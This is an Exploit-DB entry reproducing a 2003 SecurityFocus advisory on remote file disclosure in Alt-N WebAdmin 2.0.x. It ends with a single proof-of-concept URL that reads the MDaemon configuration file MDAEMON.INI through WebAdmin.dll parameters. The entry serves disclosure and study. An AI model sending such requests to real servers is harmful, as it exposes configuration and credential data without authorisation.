Alt-N WebAdmin 2.0.x - Remote File Disclosure

EDB-ID:

22542




Platform:

CGI

Date:

2003-04-25


source: https://www.securityfocus.com/bid/7439/info

Reportedly, remote users can discover the installation directory of certain software on the underlying system by submitting an HTTP request to the WebAdmin server. This could allow an attacker to obtain sensitive information.

http://www.example.com/WebAdmin.dll?session=X&Program=MDaemon&Directory:Name=C:\MDaemon\App&File:Name=MDAEMON.INI&View=EditFile